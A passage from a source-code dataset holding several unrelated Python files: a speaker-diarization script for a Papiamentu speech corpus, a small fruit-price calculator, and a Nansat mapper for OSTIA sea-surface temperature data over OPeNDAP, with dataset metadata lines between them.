f1_score\nfrom pydub import AudioSegment\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA\nfrom rich import print\nfrom sklearn.linear_model import LogisticRegression\nimport rich\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nfrom spectralcluster import (\n SpectralClusterer,\n RefinementOptions,\n ThresholdType,\n ICASSP2018_REFINEMENT_SEQUENCE,\n)\n\nfrom lists import UTTERANCES_TO_IGNORE_IN_CLUSTERING, BAD_UTTERANCES\nfrom plot_diarization import plot_diarization\n\nRANDOM_SEED = 50 # 42\nEXCLUDE_PITO = True\nnp.random.seed(RANDOM_SEED)\nN_BIBLE_SAMPLES = None\nKNOWN_SPEAKERS = { # Some quick hand-labeling\n 104010101: \"male_john_main\",\n 104010201: \"male_john_main\",\n 104010301: \"male_john_main\",\n 104010401: \"male_john_main\",\n 104010501: \"male_john_main\",\n 104010601: \"male_john_main\",\n 104010701: \"male_john_main\",\n 104010801: \"male_john_main\",\n 104010901: \"male_john_main\",\n 104011001: \"male_john_main\",\n 104011101: \"male_john_main\",\n 104011201: \"male_john_main\",\n 104011301: \"male_john_main\",\n 104011401: \"male_john_main\",\n 104011501: \"male_john_main\",\n 104011601: \"male_john_main\",\n 104011701: \"male_john_main\",\n 104011801: \"male_john_main\",\n 104011901: \"male_john_main\",\n 104012202: \"nbg\",\n 104012203: \"nbg\",\n 104012602: \"ndst\",\n 104012702: \"ndst\",\n 104013001: \"ndst\",\n 104013101: \"ndst\",\n 101050301: \"male_jesus_main\",\n 101050401: \"male_jesus_main\",\n 101050501: \"male_jesus_main\",\n 101050601: \"male_jesus_main\",\n 101050701: \"male_jesus_main\",\n 101050801: \"male_jesus_main\",\n 101050901: \"male_jesus_main\",\n 101051001: \"male_jesus_main\",\n 101051101: \"male_jesus_main\",\n 101051201: \"male_jesus_main\",\n 101051301: \"male_jesus_main\",\n 101051401: \"male_jesus_main\",\n 101051501: \"male_jesus_main\",\n 101051601: \"male_jesus_main\",\n 101051701: \"male_jesus_main\",\n 101051801: \"male_jesus_main\",\n 101051901: \"male_jesus_main\",\n 101052001: \"male_jesus_main\",\n 101052101: \"male_jesus_main\",\n 101052201: \"male_jesus_main\",\n 101052301: \"male_jesus_main\",\n 101052401: \"male_jesus_main\",\n 101052501: \"male_jesus_main\",\n 101052601: \"male_jesus_main\",\n 101052701: \"male_jesus_main\",\n 101052801: \"male_jesus_main\",\n 101052901: \"male_jesus_main\",\n 101053001: \"male_jesus_main\",\n 101053101: \"male_jesus_main\",\n 101053201: \"male_jesus_main\",\n 101053301: \"male_jesus_main\",\n 101053401: \"male_jesus_main\",\n 101053501: \"male_jesus_main\",\n 101053601: \"male_jesus_main\",\n 101053701: \"male_jesus_main\",\n 101061302: \"male_jesus_main\",\n 101041601: \"ang\",\n 101041602: \"ang\",\n 101012101: \"god\",\n 101012301: \"gabr\",\n 101012302: \"gabr\",\n 119111801: \"ang2\",\n 101010101: \"male_matthew_main\",\n 101010201: \"male_matthew_main\",\n 101010301: \"male_matthew_main\",\n 101010401: \"male_matthew_main\",\n 101010501: \"male_matthew_main\",\n 101010601: \"male_matthew_main\",\n 101010701: \"male_matthew_main\",\n 101010801: \"male_matthew_main\",\n 101010901: \"male_matthew_main\",\n 101011001: \"male_matthew_main\",\n 101011101: \"male_matthew_main\",\n 101011201: \"male_matthew_main\",\n 101011301: \"male_matthew_main\",\n 101011401: \"male_matthew_main\",\n 101011501: \"male_matthew_main\",\n 101011601: \"male_matthew_main\",\n 101011701: \"male_matthew_main\",\n 101011801: \"male_matthew_main\",\n 101011901: \"male_matthew_main\",\n 119120101: \"female_hebrews_main\",\n 119120201: \"female_hebrews_main\",\n 119120301: \"female_hebrews_main\",\n 119120401: \"female_hebrews_main\",\n 119120501: \"female_hebrews_main\",\n 119111001: \"female_hebrews_main\",\n 119111101: \"female_hebrews_main\",\n 119111201: \"female_hebrews_main\",\n 119111301: \"female_hebrews_main\",\n 119111401: \"female_hebrews_main\",\n 119111501: \"female_hebrews_main\",\n 119111601: \"female_hebrews_main\",\n 119111701: \"female_hebrews_main\",\n 119132101: \"female_hebrews_main\",\n 103030001: \"female_hebrews_main\",\n 101030001: \"female_hebrews_main\",\n 119132103: \"female_hebrews_main\",\n 103030001: \"female_hebrews_main\",\n 102060101: \"male_mark_main\",\n 102060102: \"male_mark_main\",\n 102060303: \"male_mark_main\",\n 102060601: \"male_mark_main\",\n 102060701: \"male_mark_main\",\n 102061701: \"male_mark_main\",\n 102061901: \"male_mark_main\",\n 102062101: \"male_mark_main\",\n 102062201: \"male_mark_main\",\n 102062401: \"male_mark_main\",\n 102062701: \"male_mark_main\",\n 102063001: \"male_mark_main\",\n 103010101: \"male_luke_main\",\n 103010201: \"male_luke_main\",\n 103010301: \"male_luke_main\",\n 103010401: \"male_luke_main\",\n 103010501: \"male_luke_main\",\n 103010601: \"male_luke_main\",\n 103010701: \"male_luke_main\",\n 103010801: \"male_luke_main\",\n 103010901: \"male_luke_main\",\n 103011001: \"male_luke_main\",\n 103011101: \"male_luke_main\",\n 103011201: \"male_luke_main\",\n 103010101: \"male_acts_main\",\n 103010201: \"male_acts_main\",\n 103010301: \"male_acts_main\",\n 103010401: \"male_acts_main\",\n 105011001: \"male_acts_main\",\n 105011302: \"male_acts_main\",\n 105012301: \"male_acts_main\",\n 105020301: \"male_acts_main\",\n 105020601: \"male_acts_main\",\n 105030202: \"male_acts_main\",\n 106010101: \"male_paul_main\",\n 106010201: \"male_paul_main\",\n 106010301: \"male_paul_main\",\n 106010401: \"male_paul_main\",\n 106010501: \"male_paul_main\",\n 106010601: \"male_paul_main\",\n 106010701: \"male_paul_main\",\n 106010801: \"male_paul_main\",\n 106010901: \"male_paul_main\",\n 106011001: \"male_paul_main\",\n 106011101: \"male_paul_main\",\n 106011201: \"male_paul_main\",\n 106011301: \"male_paul_main\",\n 106011401: \"male_paul_main\",\n 106011501: \"male_paul_main\",\n 106011601: \"male_paul_main\",\n 106011701: \"male_paul_main\",\n 106101202: \"male_paul_main\",\n 108080302: \"male_paul_main\",\n 120010101: \"male_james_main\",\n 120010201: \"male_james_main\",\n 120010301: \"male_james_main\",\n 120010401: \"male_james_main\",\n 120010501: \"male_james_main\",\n 120010601: \"male_james_main\",\n 120010701: \"male_james_main\",\n 120010801: \"male_james_main\",\n 120010901: \"male_james_main\",\n 120011001: \"male_james_main\",\n 120011101: \"male_james_main\",\n 120011201: \"male_james_main\",\n 120011301: \"male_james_main\",\n 120011401: \"male_james_main\",\n 120011501: \"male_james_main\",\n 120011601: \"male_james_main\",\n 120011701: \"male_james_main\",\n 120011801: \"male_james_main\",\n 120011901: \"male_james_main\",\n 120012001: \"male_james_main\",\n 120012101: \"male_james_main\",\n 120012201: \"male_james_main\",\n 120012301: \"male_james_main\",\n 120012401: \"male_james_main\",\n 120012501: \"male_james_main\",\n 120012601: \"male_james_main\",\n 120012701: \"male_james_main\",\n 126010101: \"male_jude_main\",\n 126010201: \"male_jude_main\",\n 126010301: \"male_jude_main\",\n 126010401: \"male_jude_main\",\n 126010501: \"male_jude_main\",\n 126010601: \"male_jude_main\",\n 126010701: \"male_jude_main\",\n 126010801: \"male_jude_main\",\n 126010901: \"male_jude_main\",\n 126011101: \"male_jude_main\",\n 126011201: \"male_jude_main\",\n 126011301: \"male_jude_main\",\n 126011601: \"male_jude_main\",\n 126011701: \"male_jude_main\",\n 126011301: \"male_jude_main\",\n 121010101: \"male_peter_main\",\n 121010201: \"male_peter_main\",\n 121010301: \"male_peter_main\",\n 121010401: \"male_peter_main\",\n 121010501: \"male_peter_main\",\n 121010601: \"male_peter_main\",\n 121010701: \"male_peter_main\",\n 121010801: \"male_peter_main\",\n 121011001: \"male_peter_main\",\n 121012001: \"male_peter_main\",\n 121013001: \"male_peter_main\",\n 121014001: \"male_peter_main\",\n 104183902: \"crazy_fx\",\n}\n\nCLASS_WEIGHTS = {\n \"male_matthew_main\": 1.09649,\n \"_other_\": 0.15,\n \"male_jesus_main\": 0.5952,\n \"male_mark_main\": 1.98,\n \"male_acts_main\": 3.4,\n \"male_luke_main\": 2.60416,\n \"male_john_main\": 1.35,\n \"male_paul_main\": 1.30208,\n \"female_hebrews_main\": 1.48809,\n \"male_james_main\": 0.7716049,\n \"male_jude_main\": 1.488095,\n \"pito\": 0.32051,\n \"male_peter_main\": 1.98095,\n}\n\nprint(\"👷 Beginning script...\")\nprint(f\"🔢 {len(set(KNOWN_SPEAKERS.values()))} unique labels in labeled data\")\n_DF = pd.read_csv(\"corpus.csv\")\n_DF[\"speaker_embedding\"] = _DF[\"speaker_embedding\"].apply(\n lambda x: np.fromstring(x[1:-1], sep=\" \")\n)\n_X = _DF[\"speaker_embedding\"].tolist()\nSTD_SCALER = StandardScaler()\nSTD_SCALER.fit(_X)\n\n\n@cache\ndef load_data(use_known_speakers: bool = False) -> pd.DataFrame:\n bible_df = _DF[_DF[\"utterance_id\"] < 200000000]\n bible_df = bible_df[~bible_df[\"utterance_id\"].isin(BAD_UTTERANCES)]\n bible_df = bible_df[\n ~bible_df[\"utterance_id\"].isin(UTTERANCES_TO_IGNORE_IN_CLUSTERING)\n ]\n known_speakers_df = bible_df[bible_df[\"utterance_id\"].isin(KNOWN_SPEAKERS.keys())]\n if use_known_speakers:\n bible_df = known_speakers_df\n else:\n if N_BIBLE_SAMPLES is not None:\n bible_df = bible_df.sample(n=N_BIBLE_SAMPLES, random_state=RANDOM_SEED)\n bible_df = pd.concat([bible_df, known_speakers_df])\n bible_df = bible_df.drop_duplicates(subset=\"utterance_id\")\n if not EXCLUDE_PITO:\n pito_df = _DF[_DF[\"speaker\"] == \"Pito Salas\"]\n return pd.concat([bible_df, pito_df])\n else:\n return bible_df\n\n\n@cache\ndef get_speaker(utterance_id: int) -> str:\n if utterance_id in KNOWN_SPEAKERS:\n if (\n sum([KNOWN_SPEAKERS[utterance_id] == v for v in KNOWN_SPEAKERS.values()])\n >= 5\n ):\n return KNOWN_SPEAKERS[utterance_id]\n else:\n return \"_other_\"\n else:\n return \"pito\"\n\n\n@cache\ndef get_importances() -> Tuple[np.ndarray, np.ndarray, pd.Series]:\n df = load_data(use_known_speakers=True)\n X = df[\"speaker_embedding\"].tolist()\n X = STD_SCALER.transform(X)\n y = df[\"utterance_id\"].apply(get_speaker)\n y.index = df[\"utterance_id\"]\n # # Calculate class weights manually\n # class_frequencies = Counter(y)\n # total_samples = len(y)\n # class_weights = {\n # class_label: total_samples / (len(class_frequencies) * freq)\n # for class_label, freq in class_frequencies.items()\n # }\n class_weights = CLASS_WEIGHTS\n clf = LogisticRegression(\n class_weight=class_weights, random_state=RANDOM_SEED, max_iter=3000\n )\n clf.fit(X, y.tolist())\n abs_value_coefs = np.abs(clf.coef_)\n mean_coefs = np.mean(abs_value_coefs, axis=0)\n importances = MinMaxScaler().fit_transform(mean_coefs.reshape(-1, 1)).flatten()\n return importances, X, y\n\n\ndef play_fast_snippet_of_wav(\n fpath: str, begin_ms: int = 1000, end_ms: int = 3000, speed: float = 1.9\n) -> None:\n try:\n # Load the file with pydub\n audio = AudioSegment.from_file(fpath)\n if len(audio) > 2500:\n audio = audio[begin_ms:end_ms]\n if speed is not None and speed != 1:\n audio = audio.speedup(playback_speed=speed)\n audio = audio.fade_in(200).fade_out(200)\n # Convert the PyDub AudioSegment to a NumPy array for playback\n samples = np.array(audio.get_array_of_samples())\n if audio.channels == 2:\n samples = np.reshape(samples, (-1, 2))\n # Play the audio\n sd.play(samples, audio.frame_rate)\n except:\n return\n sd.wait()\n\n\ndef spectral_cluster(\n X: List[np.ndarray],\n proportion_weighted: float,\n n_umap_components: Optional[int],\n n_lda_components: Optional[int],\n **kwargs,\n) -> List[int]:\n X = STD_SCALER.transform(X)\n importances, X_bible, y_bible = get_importances()\n assert X.shape[1] == importances.shape[0]\n weighted_X = X * importances # Weighted by logistic regression importance\n X = X * (1 - proportion_weighted) + weighted_X * proportion_weighted\n if n_umap_components is not None or n_lda_components is not None:\n weighted_X_bible = X_bible * importances\n X_bible = (\n X_bible * (1 - proportion_weighted) + weighted_X_bible * proportion_weighted\n )\n # Apply UMAP\n if n_umap_components is not None:\n reducer = UMAP(\n n_components=n_umap_components,\n random_state=RANDOM_SEED,\n n_jobs=1,\n target_metric=\"categorical\",\n )\n encoded_y_bible = LabelEncoder().fit_transform(y_bible)\n reducer.fit(X_bible, encoded_y_bible)\n X = reducer.transform(X)\n # Apply LDA\n if n_lda_components is not None:\n y_bible = y_bible.index.map(get_speaker)\n weighted_X_bible = X_bible * importances\n X_bible = (\n X_bible * (1 - proportion_weighted) + weighted_X_bible * proportion_weighted\n )\n lda = LDA(n_components=n_lda_components)\n lda.fit(X_bible, y_bible)\n X = lda.transform(X)\n # Fit Spectral Clustering\n refinement_options = RefinementOptions(\n p_percentile=kwargs[\"p_percentile\"],\n gaussian_blur_sigma=kwargs[\"gaussian_blur_sigma\"],\n thresholding_type=ThresholdType.RowMax,\n thresholding_soft_multiplier=0.12,\n refinement_sequence=ICASSP2018_REFINEMENT_SEQUENCE,\n )\n clusterer = SpectralClusterer(\n min_clusters=kwargs[\"min_clusters\"],\n max_clusters=kwargs[\"max_clusters\"],\n refinement_options=refinement_options,\n max_spectral_size=kwargs[\"max_spectral_size\"],\n )\n labels = clusterer.predict(np.array(X))\n return labels, clusterer\n\n\ndef get_bible_f1s_and_clusters(df: pd.DataFrame) -> Tuple[dict, dict]:\n assert \"cluster\" in df.columns\n known_ids = set(KNOWN_SPEAKERS.keys()) # Filter to known bible speakers\n df = df[df[\"utterance_id\"].isin(known_ids)].copy()\n df[\"speaker_class\"] = df[\"utterance_id\"].apply(get_speaker)\n bible_f1s = {}\n bible_clusters = {}\n for speaker, group in df.groupby(\"speaker_class\"):\n if speaker == \"_other_\":\n continue\n speaker_cluster = group[\"cluster\"].value_counts().index[0]\n if speaker_cluster == -1:\n speaker_cluster = group[\"cluster\"].value_counts().index[1]\n is_spkr_most_common_cluster = group[\"cluster\"] == speaker_cluster\n tp = len(group[is_spkr_most_common_cluster])\n fp = len(group[~is_spkr_most_common_cluster])\n fn = len(df[df[\"cluster\"] == speaker_cluster]) - tp\n f1 = tp / (tp + 0.5 * (fp + fn))\n bible_f1s[speaker] = f1\n bible_clusters[speaker] = speaker_cluster\n return bible_f1s, bible_clusters\n\n\ndef get_results_info(predicted_clusters: List[int], df: pd.DataFrame) -> tuple:\n df[\"cluster\"] = predicted_clusters\n bible_f1s, bible_clusters = get_bible_f1s_and_clusters(df)\n df[\"is_pito\"] = df[\"speaker\"].apply(lambda x: \"Pito\" in x)\n if EXCLUDE_PITO:\n pito_cluster = None\n confusion_dict = None\n all_f1s = list(bible_f1s.values())\n else:\n pito_cluster = df[df[\"is_pito\"]][\"cluster\"].value_counts().index[0]\n if pito_cluster == -1:\n pito_cluster = df[df[\"is_pito\"]][\"cluster\"].value_counts().index[1]\n df[\"is_pito_most_common_cluster\"] = df[\"cluster\"] == pito_cluster\n pito_f1 = f1_score(df[\"is_pito\"], df[\"is_pito_most_common_cluster\"])\n confusion_dict = {\n \"TP\": df[\n (df[\"is_pito\"] == True) & (df[\"is_pito_most_common_cluster\"] == True)\n ].shape[0],\n \"TN\": df[\n (df[\"is_pito\"] == False) & (df[\"is_pito_most_common_cluster\"] == False)\n ].shape[0],\n \"FP\": df[\n (df[\"is_pito\"] == False) & (df[\"is_pito_most_common_cluster\"] == True)\n ].shape[0],\n \"FN\": df[\n (df[\"is_pito\"] == True) & (df[\"is_pito_most_common_cluster\"] == False)\n ].shape[0],\n }\n all_f1s = list(bible_f1s.values()) + [pito_f1]\n macro_f1 = np.mean(all_f1s)\n return macro_f1, pito_cluster, confusion_dict, bible_f1s, bible_clusters\n\n\ndef run_experiments(param_combos: List[dict], df: pd.DataFrame) -> tuple:\n best_f1 = 0\n best_pito_cluster = None\n best_conf_dict = None\n best_prms = None\n best_lbls = None\n best_bible_f1s = None\n best_clusterer = None\n for params in param_combos:\n pred_labels, clusterer = spectral_cluster(\n X=X,\n **params,\n )\n f1, pito_cluster, conf_dict, bible_f1s, bible_clusters = get_results_info(\n pred_labels, df\n )\n print(f\"🧪 - F1: {f1:.2f} - NCls: {len(set(pred_labels))} - Prms: {params}\")\n if f1 > best_f1:\n best_f1 = f1\n best_prms = params\n best_lbls = pred_labels\n best_pito_cluster = pito_cluster\n best_conf_dict = conf_dict\n best_bible_f1s = bible_f1s\n best_clusterer = clusterer\n df[\"cluster\"] = best_lbls\n print(\"...\")\n print(f\"🏆 - F1: {best_f1:.2f} - NCls: {len(set(best_lbls))} - Prms: {best_prms}\")\n return (\n best_f1,\n best_pito_cluster,\n best_conf_dict,\n best_bible_f1s,\n best_clusterer,\n bible_clusters,\n )\n\n\ndef get_centroids(df: pd.DataFrame) -> Dict[int, np.ndarray]:\n centroids = {}\n for cluster in df[\"cluster\"].unique():\n cluster_df = df[df[\"cluster\"] == cluster]\n centroid = np.mean(cluster_df[\"speaker_embedding\"].tolist(), axis=0)\n centroids[cluster] = centroid\n return centroids\n\n\ndef get_closest_centroid_distance(x: np.ndarray, centroids: Dict[int, np.ndarray]):\n distances = []\n for centroid in centroids.values():\n distances.append(np.linalg.norm(x - centroid))\n return min(distances)\n\n\nPARAM_COMBOS = [\n {\n \"proportion_weighted\": 0.5, # 0.8\n \"n_umap_components\": 75,\n \"n_lda_components\": None,\n \"min_clusters\": 14,\n \"max_clusters\": 50,\n \"p_percentile\": 0.89,\n \"gaussian_blur_sigma\": 0.218,\n \"max_spectral_size\": 8_000,\n },\n]\n\n\n###################\n# RUN EXPERIMENTS #\n###################\n\ndf = load_data()\nX = df[\"speaker_embedding\"].tolist()\nf1, pito_cluster, conf_dict, bible_f1s, clusterer, bible_clusters = run_experiments(\n PARAM_COMBOS, df\n)\n\nif not EXCLUDE_PITO:\n print(\"📋 Pito Confusion Matrix:\")\n print(\"\\t❌ Predicted Pito but was something else (FP): \" + str(conf_dict[\"FP\"]))\n print(\"\\t❌ Predicted something else but was Pito (FN): \" + str(conf_dict[\"FN\"]))\n print(\"\\t✅ Predicted Pito and was Pito (TP): \" + str(conf_dict[\"TP\"]))\n print(\"👨 Pito Cluster:\", pito_cluster)\nprint(\"📖 Bible Clusters:\")\nfor speaker, cluster in bible_clusters.items():\n print(f\"\\t{speaker}: {cluster}\")\nprint(\"📖 Bible F1s:\")\nfor speaker, f1 in bible_f1s.items():\n print(f\"\\t{speaker}: {f1:.2f}\")\nprint(\"📊 Cluster Frequencies:\")\nprint(\"\\t\" + \"\\n\\t\".join(df[\"cluster\"].value_counts().__str__().split(\"\\n\")[1:-1]))\n\ncentroids = get_centroids(df)\ndf[\"degree_of_uncertainty\"] = df[\"speaker_embedding\"].apply(\n lambda x: get_closest_centroid_distance(x, centroids)\n)\ndf[\"degree_of_uncertainty\"] = (\n MinMaxScaler()\n .fit_transform(df[\"degree_of_uncertainty\"].values.reshape(-1, 1))\n .flatten()\n)\ndf.drop(columns=[\"speaker_embedding\"]).to_csv(\"clustered_corpus.csv\", index=False)\n\n##########################\n# PLOT FINAL DIARIZATION #\n##########################\n\ncluster_labels = df[\"cluster\"].unique()\ncluster_w_speaker_classes = {}\nfor cluster_label in cluster_labels:\n speaker_classes = []\n if cluster_label == pito_cluster:\n speaker_classes.append(\"Pito Salas\")\n for speaker, cluster in bible_clusters.items():\n if cluster == cluster_label:\n speaker_classes.append(speaker.split(\"_\")[1].title())\n speaker_classes = \"\\n\".join(speaker_classes)\n val = f\"{cluster_label}\\n{speaker_classes}\"\n cluster_w_speaker_classes[cluster_label] = val\ndf[\"speaker_classes_of_cluster\"] = df[\"cluster\"].map(cluster_w_speaker_classes)\n\ndf[\"author\"] = df[\"speaker\"].apply(lambda x: x.split(\"_\")[1].title() if \"_\" in x else x)\ndf[\"author\"] = df[\"author\"].apply(lambda x: f\"author: {x}\" if x != \"Pito Salas\" else x)\nplot_diarization(df)\n\n##########################################\n# LABEL UNCERTAIN AS BAD, IGNORE, & KEEP #\n##########################################\n\nuser_input = input(\"Would you like to label uncertain utterances? (y/n):\")\nif user_input == \"y\":\n uncertain_df = df[df[\"degree_of_uncertainty\"] > 0.5]\n uncertain_df = uncertain_df.sort_values(by=\"degree_of_uncertainty\", ascending=False)\n ignore, keep, bad = [], [], []\n for i, row in uncertain_df.iterrows():\n fpath = os.path.join(\"corpus_audio\", row[\"file_name\"])\n print(f\"📝 {row['utterance_id']}--{row['duration_ms'] / 1000:.2f}s\")\n play_fast_snippet_of_wav(fpath, begin_ms=1, end_ms=-1, speed=1)\n given_input = input(\n \"Select one: finish labeling (f), ignore (i), keep (k), bad (b):\"\n )\n if given_input == \"f\":\n break\n elif given_input == \"i\":\n ignore.append(row[\"utterance_id\"])\n elif given_input == \"k\":\n keep.append(row[\"utterance_id\"])\n elif given_input == \"b\":\n bad.append(row[\"utterance_id\"])\n print(\"📋 Bad:\")\n print(bad)\n print(\"📋 Ignore:\")\n print(ignore)\n\n########################################################\n# LISTENING TO/ASSESING QUALITY OF CLUSTERS ON THE FLY #\n########################################################\n\nuser_input = input(\"Would you like to listen to a speaker cluster? (y/n):\")\nif user_input == \"y\":\n user_input = input(\"Pick a cluster to listen to:\")\n n_seconds = input(\"For how many seconds would like to listen?\")\n n_seconds = int(n_seconds)\n selected_cluster = int(user_input)\n while selected_cluster in cluster_labels:\n fnames = df[df[\"cluster\"] == selected_cluster][\"file_name\"]\n fnames = fnames.sample(len(fnames)).to_list()\n fpaths = [os.path.join(\"corpus_audio\", fname) for fname in fnames]\n n_files_to_listen_to = int(n_seconds / 2)\n for fpath in fpaths[:n_files_to_listen_to]:\n play_fast_snippet_of_wav(fpath, begin_ms=1000, end_ms=3000)\n user_input = input(\"Pick a cluster to listen to (f=finish):\")\n if user_input == \"f\":\n break\n selected_cluster = int(user_input)\nchosen_dev_cluster = input(\"Pick a cluster to use for dev set:\")\n\n#####################\n# SAVING NEW CORPUS #\n#####################\ntry:\n BAD_UTTERANCES.update(bad)\nexcept NameError:\n pass\nnew_df = _DF.copy()\nnew_df = new_df[~new_df[\"utterance_id\"].isin(BAD_UTTERANCES)]\nnew_df.set_index(\"utterance_id\", inplace=True)\ndf.set_index(\"utterance_id\", inplace=True)\nnew_df[\"diarized_speaker\"] = df[\"cluster\"]\nnew_df.reset_index(inplace=True)\nnew_df['train_dev_test_split'] = 'train' # default to 'train'\nnew_df.loc[new_df['diarized_speaker'] == int(chosen_dev_cluster), 'train_dev_test_split'] = 'dev'\nnew_df.loc[new_df['speaker'] == 'Pito Salas', 'train_dev_test_split'] = 'test'\nnew_df.to_csv(\"diarized_corpus.csv\", index=False)\nprint(new_df['train_dev_test_split'].value_counts())\nprint(\"👷 Done!\")\n","repo_name":"sonnygeorge/papiamentu-asr-corpus","sub_path":"diarize.py","file_name":"diarize.py","file_ext":"py","file_size_in_byte":23429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41440963367","text":"\nprice_fruit = {\n 'Plátano': 1.35,\n 'Mazá': 0.80,\n 'Pera': 0.85,\n 'Laranxa': 0.70\n}\n\n\ndef cal_price(fr, kg):\n if fr in price_fruit.keys():\n return kg * price_fruit[fr]\n else:\n return f\"{fr} no está disponible\"\n\n\nprint(cal_price(input(\"Introduce fruta\\n\"), int(input(\"Introduce kilos\\n\"))))\n","repo_name":"jsamperevazquez/Programacion_IA","sub_path":"python/tarea38.py","file_name":"tarea38.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33342379498","text":"# Name: mapper_opendap_ostia.py\n# Purpose: Nansat mapping for GHRSST Level 4 OSTIA Global Foundation Sea Surface\n# Temperature Analysis\n# Author: Artem Moiseev\n# Licence: This file is part of NANSAT. You can redistribute it or modify\n# under the terms of GNU General Public License, v.3\n# http://www.gnu.org/licenses/gpl-3.0.html\n\nfrom nansat.mappers.opendap import Opendap\nfrom nansat.nsr import NSR\nimport pythesint as pti\nimport os\nfrom datetime import datetime\nimport numpy as np\nimport json\nfrom netCDF4 import Dataset\n\n\nclass Mapper(Opendap):\n\n baseURLs = [\n 'https://podaac-opendap.jpl.nasa.gov:443/opendap/allData/ghrsst/data/L4/GLOB/UKMO/OSTIA',\n 'https://opendap.jpl.nasa.gov:443/opendap/OceanTemperature/ghrsst/data/L4/GLOB/UKMO/OSTIA'\n ]\n\n timeVarName = 'time'\n xName = 'lon'\n yName = 'lat'\n timeCalendarStart = '1981-01-01'\n srcDSProjection = NSR().wkt\n\n def __init__(self, filename, gdal_dataset, gdal_metadata, date=None,\n ds=None, bands=None, cachedir=None, *args, **kwargs):\n\n self.test_mapper(filename)\n timestamp = date if date else self.get_date(filename)\n ds = Dataset(filename)\n self.create_vrt(filename, gdal_dataset, gdal_metadata, timestamp, ds, bands, cachedir)\n self.dataset.SetMetadataItem('entry_title', str(ds.getncattr('title')))\n self.dataset.SetMetadataItem('data_center', json.dumps(pti.get_gcmd_provider('UK/MOD/MET')))\n self.dataset.SetMetadataItem('ISO_topic_category',\n pti.get_iso19115_topic_category('oceans')['iso_topic_category'])\n self.dataset.SetMetadataItem('gcmd_location', json.dumps(pti.get_gcmd_location('sea surface')))\n\n #mm = pti.get_gcmd_instrument('amsr-e')\n #ee = pti.get_gcmd_platform('aqua')\n #self.dataset.SetMetadataItem('instrument', json.dumps(mm))\n #self.dataset.SetMetadataItem('platform', json.dumps(ee))\n self.dataset.SetMetadataItem('platform/instrument',\n json.dumps(self.get_platform_and_instrument_list(ds)))\n\n @staticmethod\n def get_date(filename):\n \"\"\"Extract date and time parameters from filename and return\n it as a formatted (isoformat) string\n\n Parameters\n ----------\n\n filename: str\n nn\n\n Returns\n -------\n str, YYYY-mm-ddThh:MMZ\n\n \"\"\"\n _, filename = os.path.split(filename)\n t = datetime.strptime(filename.split('-')[0], '%Y%m%d')\n return datetime.strftime(t, '%Y-%m-%dT%H:%M:00Z')\n\n def convert_dstime_datetimes(self, ds_time):\n \"\"\"Convert time variable to np.datetime64\"\"\"\n ds_datetimes = np.array(\n [(np.datetime64(self.timeCalendarStart).astype('M8[s]')\n + np.timedelta64(int(sec), 's').astype('m8[s]')) for sec in ds_time]).astype('M8[s]')\n return ds_datetimes\n\n @staticmethod\n def get_platform_and_instrument_list(ds):\n \"\"\" This method uses the source_data in the OPeNDAP dataset to select the platforms\n and instruments. It checks the hardcoded dictionary, pi, to find the platform and instrument\n for products given in the source_data. The reason for that is that the items in source_data\n are not in the GCMD keywords but rather refer to products of certain instruments. If you\n search the internet for the dictionary keys, you'll find a dataset description which\n includes the listed platforms and instruments.\n \"\"\"\n pi = {\n 'AVHRR18_G-NAVO-L2P-V1.0': [pti.get_gcmd_platform('noaa-18'),\n pti.get_gcmd_instrument('avhrr-3')],\n 'AVHRR19_G-NAVO-L2P-V1.0': [pti.get_gcmd_platform('noaa-19'),\n pti.get_gcmd_instrument('avhrr')],\n 'AVHRR_SST_METOP_B-OSISAF-L2P-V1.0': [pti.get_gcmd_platform('metop-b'),\n pti.get_gcmd_instrument('avhrr')],\n 'VIIRS_NPP-OSPO-L2P-V2.3': [pti.get_gcmd_platform('suomi-npp'),\n pti.get_gcmd_instrument('viirs')],\n 'AMSR2-REMSS-L2P-V07.2': [pti.get_gcmd_platform('gcom-w1'),\n pti.get_gcmd_instrument('amsr2')],\n 'GOES13-OSISAF-L3C-V1.0': [pti.get_gcmd_platform('goes-16'),\n pti.get_gcmd_instrument('abi')],\n 'SEVIRI_SST-OSISAF-L3C-V1.0': [pti.get_gcmd_platform('msg'),\n pti.get_gcmd_instrument('seviri')],\n 'OSISAF_ICE': [pti.get_gcmd_platform('earth observation satellites'),\n pti.get_gcmd_instrument('Imaging Spectrometers/Radiometers')],\n 'NCEP_ICE': [pti.get_gcmd_platform('ncep-gfs'),\n pti.get_gcmd_instrument('computer')],\n 'AMSRE': [pti.get_gcmd_platform('aqua'), pti.get_gcmd_instrument('amsr-e')],\n 'ATS_NR_2P': [pti.get_gcmd_platform('envisat'), pti.get_gcmd_instrument('aatsr')],\n 'AVHRR18_G': [pti.get_gcmd_platform('noaa-18'), pti.get_gcmd_instrument('avhrr-3')],\n 'AVHRR17_NAR': [pti.get_gcmd_platform('noaa-17'), pti.get_gcmd_instrument('avhrr')],\n 'AVHRR18_NAR': [pti.get_gcmd_platform('noaa-18'), pti.get_gcmd_instrument('avhrr-3')],\n 'SEVIRI': [pti.get_gcmd_platform('msg'), pti.get_gcmd_instrument('seviri')],\n 'TMI': [pti.get_gcmd_platform('trmm'), pti.get_gcmd_instrument('tmi')],\n }\n pi_list = []\n # Here, we may have a dilemma: for example, the dataset at\n # https://opendap.jpl.nasa.gov:443/opendap/OceanTemperature/ghrsst/data/L4/GLOB/UKMO/OSTIA/2008/002/20080102-UKMO-L4HRfnd-GLOB-v01-fv02-OSTIA.nc.bz2\n # has source data AVHRR18_G and AVHRR18_NAR. I don't know the difference between them but\n # presume both are noaa18/AVHRR-3. It means duplication. Might not be a problem in Nansat,\n # though, and it could be easy to solve in django-geo-spaas...\n for source_data in ds.source_data.split(','):\n pi_list.append(pi[source_data.strip()])\n return pi_list\n\n","repo_name":"nansencenter/nansat","sub_path":"nansat/mappers/mapper_opendap_ostia.py","file_name":"mapper_opendap_ostia.py","file_ext":"py","file_size_in_byte":6131,"program_lang":"python","lang":"en","doc_type":"code","stars":170,"dataset":"github-code","pt":"61"} +{"seq_id":"42010934023","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy.linalg import norm\nfrom sklearn.metrics import accuracy_score, confusion_matrix\n\nfrom scripts.Utility_Functions import 